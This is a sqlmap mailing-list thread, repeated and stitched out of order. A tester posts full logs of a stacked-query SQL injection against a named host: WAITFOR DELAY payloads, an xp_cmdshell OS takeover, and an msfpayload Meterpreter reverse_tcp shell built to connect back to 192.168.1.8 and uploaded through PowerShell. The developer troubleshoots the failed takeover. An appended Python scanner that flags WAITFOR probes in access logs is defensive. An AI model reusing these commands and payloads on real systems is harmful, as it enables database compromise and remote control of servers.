>> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
>> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
>> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>> [11:13:12] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
>> [11:13:12] [INFO] retrieved:
>> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
>> [11:13:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] y
>> [11:13:15] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
>> [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
>> [11:13:16] [CRITICAL] page not found (404)
>> [11:13:16] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 11:13:16
>>
>> --end---
>>
>> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Hi.
>>>
>>> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. That way you'll kill the possibility to get perfectly valid results with other techniques
>>> 2) In the current state, you've got some "trashy" characters (because of a combination of a laggy connection and stacked SQLi), like: "D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use --fresh-queries in such situations (once per run where you expect resume of trashy chars) to force sqlmap to try to retrieve the problematic value once again.
>>>
>>> Bye
>>>
>>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
>>>
>>>> Hi All,
>>>>
>>>> In the first phase of our test we discovered the target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried through all (BEUSTQ) and found the same state.
>>>>
>>>> During an attempt a few days after our success we noticed some of the parameters are not working and we are receiving errors; for instance, during a requery for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a requery for -U sa --passwords we received "unnable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".
>>>>
>>>> We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname", "whoami" and successfully retrieved their output.
>>>>
>>>> Now after a few minutes we noted that we are not getting any output of any command, with the message "No output".
>>>>
>>>> We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. Received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times"
>>>>
>>>> I'm attaching the screen log; please help me with this if there is any scope available.
>>>> Thanks in advance.
>>>>
>>>> -------screen logs start-------
>>>>
>>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
>>>>          _
>>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>>> |_ -| . |     | .'| . |
>>>> |___|_  |_|_|_|_|__,|  _|
>>>>       |_|       |_|   http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>
>>>> [*] starting at 10:03:33
>>>>
>>>> mytarget_login
>>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>>> test_msf7
>>>> mytarget_login
>>>> /opt/metasploit/apps/pro/msf3
>>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>>> [10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
>>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
>>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>>> [10:03:33] [INFO] testing connection to the target URL
>>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>>> sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
>>>> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
>>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
>>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
>>>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>>>> ---
>>>> Parameter: testNumber (POST)
>>>>     Type: stacked queries
>>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>>     Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>>> ---
>>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>>> back-end DBMS: Microsoft SQL Server 2008
>>>> how do you want to establish the tunnel?
>>>> [1] TCP: Metasploit Framework (default)
>>>> [2] ICMP: icmpsh - ICMP tunneling
>>>> > 1
>>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>>> [10:04:00] [INFO] testing if current user is DBA
>>>> [10:04:00] [DEBUG] creating a support table to write commands standard output to
>>>> [10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>>> [10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>>> which connection type do you want to use?
>>>> [1] Reverse TCP: Connect back from the database host to this machine (default)
>>>> [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
>>>> [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
>>>> [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
>>>> [5] Bind TCP: Listen on the database host for a connection
>>>> > 1
>>>> what is the local address? [192.168.1.8]
>>>> which local port number do you want to use? [61371]
>>>> which payload do you want to use?
>>>> [1] Meterpreter (default)
>>>> [2] Shell
>>>> [3] VNC
>>>> > 1
>>>> [10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>>> [10:04:17] [INFO] creation in progress .................. done
>>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>>>> [10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, please wait..
>>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmppsbcbi.ps1
>>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>>> [10:04:37] [INFO] retrieved:
>>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>>>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
>>>> [10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfegab.txt, please wait..
>>>> [10:04:41] [CRITICAL] page not found (404)
>>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times
>>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>>>
>>>> [*] shutting down at 10:04:41
>>>>
>>>> root@kali:~#
>>>>
>>>> -------screen logs end-------
>>>>
>>>> Please help!!
>>>>
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2015-07-02 08:41:43
|
In your case, 404 is an indication that the file has not been found in the expected place.

Now I see that the temporary file path is not being "refreshed" by the --fresh-queries. Please rerun the whole case with the --flush-session

Bye

p.s. in your case sqlmap tried to upload the file to the trashy location because of the previously retrieved faulty temp location

On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> wrote:

> Hi,
> Thanks for your reply.
>
> This time I tried with --fresh-queries without specific --techniques.
>
> Why am I getting the error "page not found (404)" again and again? Does it indicate that the file is being written but is deleted by anti-virus control or something, and that's why, while calling the uploaded file, the 404 error is appearing? Can this be the case? Need your opinion and expertise.
>
> Thanks
>
> --start---
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [11:12:52] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
> [11:12:52] [INFO] creation in progress .................. done
> [11:13:10] [DEBUG] the shellcode size is 308 bytes
> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL injection technique
> [11:13:10] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, please wait..
> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
> [11:13:12] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
> [11:13:12] [INFO] retrieved:
> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
> [11:13:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] y
> [11:13:15] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
> [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
> [11:13:16] [CRITICAL] page not found (404)
> [11:13:16] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 1 times
> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>
> [*] shutting down at 11:13:16
>
> --end---
>
> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. That way you'll kill the possibility to get perfectly valid results with other techniques
>> 2) In the current state, you've got some "trashy" characters (because of a combination of a laggy connection and stacked SQLi), like: "D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use --fresh-queries in such situations (once per run where you expect resume of trashy chars) to force sqlmap to try to retrieve the problematic value once again.
>>
>> Bye
>>
>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
>>
>>> Hi All,
>>>
>>> In the first phase of our test we discovered the target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried through all (BEUSTQ) and found the same state.
>>>
>>> During an attempt a few days after our success we noticed some of the parameters are not working and we are receiving errors; for instance, during a requery for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a requery for -U sa --passwords we received "unnable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".
>>>
>>> We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname", "whoami" and successfully retrieved their output.
>>>
>>> Now after a few minutes we noted that we are not getting any output of any command, with the message "No output".
>>>
>>> We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. Received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times"
>>>
>>> I'm attaching the screen log; please help me with this if there is any scope available.
>>> Thanks in advance.
>>>
>>> -------screen logs start-------
>>>
>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
>>>          _
>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>> |_ -| . |     | .'| . |
>>> |___|_  |_|_|_|_|__,|  _|
>>>       |_|       |_|   http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>
>>> [*] starting at 10:03:33
>>>
>>> mytarget_login
>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>> test_msf7
>>> mytarget_login
>>> /opt/metasploit/apps/pro/msf3
>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>> [10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>> [10:03:33] [INFO] testing connection to the target URL
>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>> sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
>>> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
>>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>>> ---
>>> Parameter: testNumber (POST)
>>>     Type: stacked queries
>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>     Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>> ---
>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>> back-end DBMS: Microsoft SQL Server 2008
>>> how do you want to establish the tunnel?
>>> [1] TCP: Metasploit Framework (default)
>>> [2] ICMP: icmpsh - ICMP tunneling
>>> > 1
>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>> [10:04:00] [INFO] testing if current user is DBA
>>> [10:04:00] [DEBUG] creating a support table to write commands standard output to
>>> [10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>> [10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>> which connection type do you want to use?
>>> [1] Reverse TCP: Connect back from the database host to this machine (default)
>>> [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
>>> [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
>>> [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
>>> [5] Bind TCP: Listen on the database host for a connection
>>> > 1
>>> what is the local address? [192.168.1.8]
>>> which local port number do you want to use? [61371]
>>> which payload do you want to use?
>>> [1] Meterpreter (default)
>>> [2] Shell
>>> [3] VNC
>>> > 1
>>> [10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>> [10:04:17] [INFO] creation in progress .................. done
>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>>> [10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe'
>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, please wait..
>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmppsbcbi.ps1
>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>> [10:04:37] [INFO] retrieved:
>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
>>> [10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfegab.txt, please wait..
>>> [10:04:41] [CRITICAL] page not found (404)
>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>> 404 (Not Found) - 1 times
>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>>
>>> [*] shutting down at 10:04:41
>>>
>>> root@kali:~#
>>>
>>> -------screen logs end-------
>>>
>>> Please help!!
>>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>

--
Miroslav Stampar
http://about.me/stamparm
|
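The injection vector sqlmap reported in the quoted log, "; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--", is also what a defender can hunt for on the server side, and the delay each request asks for gives a way to separate a confirmed time-based injection from a probe the application rejected. The script below is an added detection example written for this thread; it is not sqlmap code and not anything posted on the list. The access-log format, the sample log lines and the elapsed-time field are constructed assumptions, chosen so the example runs offline.

```python
"""Spot time-based stacked-query SQL injection probes in web access logs.

Added example for this thread, not sqlmap code. It assumes a constructed
access-log format with one request per line:

    <client_ip> <HH:MM:SS> "<METHOD> <path>" <status> <elapsed_ms> "<urlencoded POST body>"

Each hit on the stacked WAITFOR DELAY shape is cross-checked against the
server-side response time: a request that asked for a 5 s delay and really
took >= 5 s is a confirmed injection, not just a rejected probe.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<time>\d{2}:\d{2}:\d{2}) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'(?P<status>\d{3}) (?P<elapsed_ms>\d+) "(?P<body>[^"]*)"$'
)
# Inline comments are a common tamper trick (space2comment is named in the
# thread), so they are squashed to a single space before pattern matching.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# A quote closing the injected string, a statement separator, then either an
# inference branch or the delay itself: the stacked-query shape from the log.
STACKED_RE = re.compile(r"'\s*;\s*(?:IF\s*\(|WAITFOR\b)", re.IGNORECASE)
WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    time: str
    path: str
    param: str
    requested_delay_s: int
    elapsed_ms: int
    delay_confirmed: bool


def normalize(value: str) -> str:
    """URL-decode a parameter value and strip inline-comment tampering."""
    return COMMENT_RE.sub(" ", unquote_plus(value))


def requested_delay(value: str) -> Optional[int]:
    """Seconds of delay a WAITFOR DELAY 'h:m:s' clause asks for, if present."""
    m = WAITFOR_RE.search(value)
    if not m:
        return None
    h, mnt, s = (int(x) for x in m.groups())
    return h * 3600 + mnt * 60 + s


def scan(lines) -> List[Finding]:
    """Return one Finding per POST parameter carrying a stacked WAITFOR payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        elapsed_ms = int(m["elapsed_ms"])
        for pair in m["body"].split("&"):
            name, _, raw = pair.partition("=")
            value = normalize(raw)
            if not STACKED_RE.search(value):
                continue
            delay = requested_delay(value)
            if delay is None:
                continue
            findings.append(Finding(
                ip=m["ip"], time=m["time"], path=m["path"], param=name,
                requested_delay_s=delay, elapsed_ms=elapsed_ms,
                # The decisive signal: the server actually slept as instructed.
                delay_confirmed=elapsed_ms >= delay * 1000,
            ))
    return findings


# Constructed sample lines, not real traffic. The second line carries the
# payload quoted in the thread, URL-encoded the way a client would send it;
# the third adds an inline comment; the fourth carries the payload but the
# server did not sleep, so it is reported as a probe only.
SAMPLE_LOG = [
    '10.0.0.5 10:03:33 "POST /login.aspx" 302 120 "tryID=2&testNumber=333333333333&testPassword=3243"',
    '10.0.0.5 10:03:56 "POST /login.aspx" 302 5210 "tryID=2&testNumber=333333333333%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&testPassword=3243"',
    '10.0.0.5 10:04:00 "POST /login.aspx" 302 5300 "testNumber=1%27%3B+IF%281%3D1%29+WAITFOR/**/DELAY+%270%3A0%3A5%27--"',
    '10.0.0.9 10:05:00 "POST /login.aspx" 302 130 "testNumber=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--"',
    '10.0.0.9 10:05:01 "GET /login.aspx" 200 45 ""',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        state = "CONFIRMED" if f.delay_confirmed else "probe only"
        print(f"{f.time} {f.ip} {f.path} param={f.param} delay={f.requested_delay_s}s "
              f"took={f.elapsed_ms}ms -> {state}")
```

The response-time cross-check is what makes the alert worth paging on: the same payload against a host that escapes quotes correctly produces a match but no delay, while a host that sleeps for exactly the requested interval has executed attacker-controlled T-SQL. Running this over the whole log also exposes the slow, repetitive request pattern that the "larger statistical model" warning in the quoted run implies, dozens of near-identical POSTs each taking a multiple of the sleep time.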
From: Peter L. <myp...@gm...> - 2015-07-02 07:13:56
|
Hi, Thanks for your reply. This time I tried with --fresh-queries without specific --techniques. why am I getting error "page not found (404)" again and again? Does it indicate that file is being written but is deleted by Anti-Virus control or something and that's why while calling the uploaded file 404 error is appearing, Can this be the case ? Need your opinion and expertise. Thanks --start--- root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > 1 [11:12:52] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX [11:12:52] [INFO] creation in progress .................. done [11:13:10] [DEBUG] the shellcode size is 308 bytes [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe' [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL injection technique [11:13:10] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe' [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, please wait.. [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1 [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait.. 
